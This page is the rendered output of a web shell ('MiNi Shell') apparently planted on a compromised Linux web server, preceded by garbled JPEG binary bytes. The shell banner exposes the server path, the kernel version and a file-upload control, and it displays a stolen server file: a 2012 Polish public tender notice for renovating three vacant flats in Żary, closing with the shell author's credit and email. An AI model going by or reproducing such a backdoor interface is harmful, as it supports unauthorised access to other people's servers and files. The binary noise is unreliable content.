JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120419/124330-N-2012.html

<p class="kh_header"><b>Żary: Remonty wolnych lokali mieszkalnych: ul. Gnieźnieńska 10/2, Okrzei 37/8, Żabikowska 5/2 w Żarach.</b><br>
<b>Numer ogłoszenia: 124330 - 2012; data zamieszczenia: 19.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej sp. z o.o. , ul. Zakopiańska 7, 68-200 Żary, woj. lubuskie, tel. 068 4791469, faks 068 4539004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgmzary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty wolnych lokali mieszkalnych: ul. Gnieźnieńska 10/2, Okrzei 37/8, Żabikowska 5/2 w Żarach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Gnieźnieńska 10/2
/ zgodnie z uzg. z U. M / z dnia 15.09.2011 /

- wymiana kompletna instalacji elek. + pomiary / dod. pokój na poddaszu /	lok.
 - wykonanie oddzielnego obwodu na podłączenie kuchni elek. z piekarnikiem
   w pom. kuchni
- wymiana  kompletu stolarki okiennej drewnianej na PCV z zachowaniem wymiarów 
  i podziału okien                                                        szt. 4
- wymiana parapetów zew. i wew. wraz z wykonaniem obróbek tynkarskich   szt. 8                                                                           
- wymiana drzwi wejściowych do lokalu wraz zamkami / zamki  szt. 2 /	
 + klamki+ szyldy                                                                                                  szt. 1
- dostarczenie opinii kominiarskiej dot. prawidłowości podłączenia urządzeń
  gazowych i wentylacji pomieszczeń 		
- wykonanie podłogi w kuchni / płyta OSB + panele + listwy rozbieralne /
- wymiana części zniszczonej podłogi w miejscu po byłym zlewozmywaku 

- wydzielenie pomieszczenia łazienki wraz z budową wewnętrznej instalacji w-k i 
   wewnętrznej instalacji gazowej oraz wyprowadzenie kominów wentylacyjno
- spalinowych przez ścianę na zew. budynku na  podstawie opracowanego  
   projektu budowlanego 
  / Decyzja nr 171/2012 z dnia 05.03.2012 /

 Pozycje zawarte w kosztorysie ślepym dotyczące montażu kuchni gazowej wraz z 
 odcinkiem instalacji gazowej zasilającej KG, montaż zlewozmywaka 
 zainstalowanego na szafce wraz z osprzętem należy pominąć / nie dotyczy 
 opomiarowania instalacji wodnej /  

                      Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Okrzei 37/8
/ zgodnie z uzg. z U. M / z dnia 28.07.11 i 15.09.2011 

            
- wymiana kompletna instalacji elek. + pomiary	 				
lok.
	
- dopasowanie i odnowienie stolarki okiennej drewnianej 				szt. 3                                                                         
	
- wymiana drzwi wejściowych do lokalu wraz zamkami / zamki  szt. 2 /	            
  + klamki+ szyldy                                                                                                szt. 1
 - wymiana drzwi wewnętrznych wraz z klamkami i szyldami /
 - z kuchni do pokoju - prawe                                        				szt.1
- dostarczenie opinii kominiarskiej dot. prawidłowości podłączenia urządzeń
   gazowych i wentylacji pomieszczeń 
- rozebranie ścianki działowej w pokoju i elementów drewnianych pozostałych
  po boazerii				
- zerwanie wykładziny PCV z podłóg w kuchni i p. pokoju				lok.
- wykonanie nowej podłogi / pokój + kuchnia + p. pokój / - płyta OSB 
  + panele podłogowe	+ listwy rozbieralne						lok.
- zerwanie tapet ze ścian 								lok.
- naprawa i szpachlowanie ścian i sufitów / 2x / z zagruntowaniem		lok
- rozebranie pieca licowanego kaflami						szt. 1
- wykonanie fundamentu pod piec							szt. 1
- postawienie pieca licowanego kaflami wraz z pełnym osprzętem
  i podłączenie do przewodu dymowego + dostarczenie opinii kominiarskiej
  dot. prawidłowości podłączenia							szt. 1
- montaż kuchni gazowej 4pal. z piekarnikiem gazowym z osprzętem		szt.1
- wykonanie instalacji gazowej do kuchenki  + protokół z próby
   szczelności instalacji gazowej 
- wywiezienie gruzu powstałego w wyniku prowadzonego remontu

- wydzielenie pomieszczenia łazienki wraz z budową wewnętrznej instalacji w-k 
   i wewnętrznej instalacji gazowej oraz wyprowadzenie komina wentylacyjnego
  przez ścianę na zew. budynku na  podstawie opracowanego  projektu  
  budowlanego 
  / Decyzja nr 1170/2012 z dnia 05.03.2012 /
  
Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Żabikowskiej 5/2

- wymiana kompletna instalacji elek. + pomiary	 				lok.
- wymiana  kompletu stolarki okiennej drewnianej na PCV z zachowaniem wymiarów 
 i podziału okien                                                                                                      szt. 3
 - wymiana parapetów zew. i wew. wraz z wykonaniem obróbek tynkarskich	szt. 6           	     
                                                                              
- wymiana drzwi wejściowych do lokalu wraz zamkami / zamki  szt. 2 /	 
 + klamki + szyldy                                                                                                szt. 1
- wymiana drzwi wewnętrznych wraz z klamkami i szyldami oraz zamkiem 
              / do kuchni i łazienki /	                  	                                                           szt.2
- dostarczenie opinii kominiarskiej dot. prawidłowości podłączenia urządzeń
   gazowych i wentylacji pomieszczeń 		
- zbicie zawilgoconych i odspojonych tynków w kuchni i wykonanie nowych
- przygotowanie ścian i sufitów pod malowanie / 2x szpachlowanie /  		lok.
- zerwanie wykładziny w kuchni i pokoju
- naprawa podłogi + ułożenie płyty OSB w pom. kuchni i pokoju

- wydzielenie pomieszczenia łazienki wraz z budową wewnętrznej instalacji w-k 
   i  wewnętrznej instalacji gazowej oraz wyprowadzenie kominów wentylacyjno
 - spalinowych przez ścianę na zew. budynku na  podstawie opracowanego  
    projektu budowlanego 
 / Decyzja nr 168/2012 z dnia 05.03.2012 /.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.00.00.00-1, 45.30.00.00-0, 45.26.26.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy- spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy- spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy- spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy- spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy- spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o wykonawcy- zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1	ZMIANY OGÓLNE
Możliwa jest:
a) zmiana adresu/siedziby Zamawiającego/Wykonawcy;
b) zmiana osób występujących po stronie Zamawiającego/Wykonawcy.
1.2	ZMIANY RZUTUJĄCE NA TERMIN WYKONANIA UMOWY
1.2.1. Możliwa jest zmiana terminu wykonania umowy, ewentualnie wstrzymanie/wznowienie robót, ze względu na:
a) uzasadnione zmiany w zakresie sposobu wykonania przedmiotu zamówienia proponowane przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
b) konieczność oczekiwania Wykonawcy na dostawę zamówionej stolarki okiennej pod warunkiem zamówienia jej w ciągu pierwszych 3 dni od podpisania umowy oraz niezwłocznym poinformowaniu Zamawiającego o możliwym terminie odbioru stolarki okiennej wykraczającym poza termin realizacji umowy. Zamawiający ma prawo weryfikacji terminów wykonania stolarki okiennej u innych producentów oraz w uzasadnionym przypadku odmowy wydłużenia terminu.
c) przedłużenie procedury przetargowej;
d) uwarunkowania społeczne (protesty, listy, petycje, itp.);
e) konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami
nieruchomości;
f) technologię wykonywania robót;
g) zmiany stanu prawnego;
h) działania sił natury, uznanych za stan klęski żywiołowej;
i) działania osób trzecich uniemożliwiające wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
1.2.2. Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.
 2. Określa się następujący tryb dokonywania zmian postanowień umowy:
2.1 Zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.
2.2 Strona występująca o zmianę postanowień  zawartej umowy zobowiązana jest do udokumentowania zaistnienia powyższych okoliczności.
2.3 Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgmzary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 68-200 Żary ul. Zakopiańska 7 , pokój Dział Techniczny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 10:00, miejsce: 68-200 Żary ul. Zakopiańska 7, SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont wolnego lokalu: ul. Gnieźnieńska 10/2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Gnieźnieńska 10/2
/ zgodnie z uzg. z U. M / z dnia 15.09.2011 /

            - wymiana kompletna instalacji elek. + pomiary / dod. pokój na poddaszu /	lok.
            - wykonanie oddzielnego obwodu na podłączenie kuchni elek. z piekarnikiem
               w pom. kuchni
	- wymiana  kompletu stolarki okiennej drewnianej na PCV z zachowaniem wymiarów 
              i podziału okien                                                                                                      szt. 4
           - wymiana parapetów zew. i wew. wraz z wykonaniem obróbek tynkarskich         szt. 8                                                                           
	- wymiana drzwi wejściowych do lokalu wraz zamkami / zamki  szt. 2 /	
               + klamki + szyldy                                                                                                  szt. 1
	- dostarczenie opinii kominiarskiej dot. prawidłowości podłączenia urządzeń
              gazowych i wentylacji pomieszczeń 		
	- wykonanie podłogi w kuchni / płyta OSB + panele + listwy rozbieralne /
               - wymiana części zniszczonej podłogi w miejscu po byłym zlewozmywaku 

	- wydzielenie pomieszczenia łazienki wraz z budową wewnętrznej instalacji w-k i 
              wewnętrznej instalacji gazowej oraz wyprowadzenie kominów wentylacyjno
              - spalinowych przez ścianę na zew. budynku na  podstawie opracowanego  
              projektu budowlanego 
              / Decyzja nr 171/2012 z dnia 05.03.2012 /	

              pozycje zawarte w kosztorysie ślepym dotyczące montażu kuchni gazowej wraz z 
              odcinkiem instalacji gazowej zasilającej KG, montaż zlewozmywaka 
              zainstalowanego na szafce wraz z osprzętem należy pominąć / nie dotyczy 
              opomiarowania instalacji wodnej /.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0, 45.26.26.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont wolnego lokalu ul. Okrzei 37/8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Okrzei 37/8
/ zgodnie z uzg. z U. M / z dnia 28.07.11 i 15.09.2011 

            - wymiana kompletna instalacji elek. + pomiary	 				lok.
	- dopasowanie i odnowienie stolarki okiennej drewnianej 				szt. 3                                                                         
	- wymiana drzwi wejściowych do lokalu wraz zamkami / zamki  szt. 2 /	            
                                                                                                                    
               + klamki + szyldy                                                                                                szt. 1
           - wymiana drzwi wewnętrznych wraz z klamkami i szyldami /
              - z kuchni do pokoju - prawe                                        				szt.1
	- dostarczenie opinii kominiarskiej dot. prawidłowości podłączenia urządzeń
              gazowych i wentylacji pomieszczeń 
	- rozebranie ścianki działowej w pokoju i elementów drewnianych pozostałych
              po boazerii				
	- zerwanie wykładziny PCV z podłóg w kuchni i p. pokoju				lok.
	- wykonanie nowej podłogi / pokój + kuchnia + p. pokój / - płyta OSB 
              + panele podłogowe	+ listwy rozbieralne						lok.
	- zerwanie tapet ze ścian 								lok.
	- naprawa i szpachlowanie ścian i sufitów / 2x / z zagruntowaniem		lok
	- rozebranie pieca licowanego kaflami						szt. 1
	- wykonanie fundamentu pod piec							szt. 1
	- postawienie pieca licowanego kaflami wraz z pełnym osprzętem
              i podłączenie do przewodu dymowego + dostarczenie opinii kominiarskiej
              dot. prawidłowości podłączenia							szt. 1
	- montaż kuchni gazowej 4pal. z piekarnikiem gazowym z osprzętem		szt.1
	- wykonanie instalacji gazowej do kuchenki  + protokół z próby
               szczelności instalacji gazowej 
	- wywiezienie gruzu powstałego w wyniku prowadzonego remontu

	- wydzielenie pomieszczenia łazienki wraz z budową wewnętrznej instalacji w-k 
              i wewnętrznej instalacji gazowej oraz wyprowadzenie komina wentylacyjnego
              przez ścianę na zew. budynku na  podstawie opracowanego  projektu  
              budowlanego 
              / Decyzja nr 1170/2012 z dnia 05.03.2012 /.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0, 45.26.26.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont wolnego lokalu ul. Żabikowska 5/2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Żabikowskiej 5/2

	- wymiana kompletna instalacji elek. + pomiary	 				lok.
	- wymiana  kompletu stolarki okiennej drewnianej na PCV z zachowaniem wymiarów 
              i podziału okien                                                                                                      szt. 3
           - wymiana parapetów zew. i wew. wraz z wykonaniem obróbek tynkarskich	szt. 6           	     
                                                                              
	- wymiana drzwi wejściowych do lokalu wraz zamkami / zamki  szt. 2 /	 
               + klamki + szyldy                                                                                                szt. 1
	- wymiana drzwi wewnętrznych wraz z klamkami i szyldami oraz zamkiem 
              / do kuchni i łazienki /	                  	                                                           szt.2
	- dostarczenie opinii kominiarskiej dot. prawidłowości podłączenia urządzeń
              gazowych i wentylacji pomieszczeń 		
            - zbicie zawilgoconych i odspojonych tynków w kuchni i wykonanie nowych
	- przygotowanie ścian i sufitów pod malowanie / 2x szpachlowanie /  		lok.
	- zerwanie wykładziny w kuchni i pokoju
	- naprawa podłogi + ułożenie płyty OSB w pom. kuchni i pokoju

	- wydzielenie pomieszczenia łazienki wraz z budową wewnętrznej instalacji w-k 
              i  wewnętrznej instalacji gazowej oraz wyprowadzenie kominów wentylacyjno
              - spalinowych przez ścianę na zew. budynku na  podstawie opracowanego  
              projektu budowlanego 
              / Decyzja nr 168/2012 z dnia 05.03.2012 /.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0, 45.26.26.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com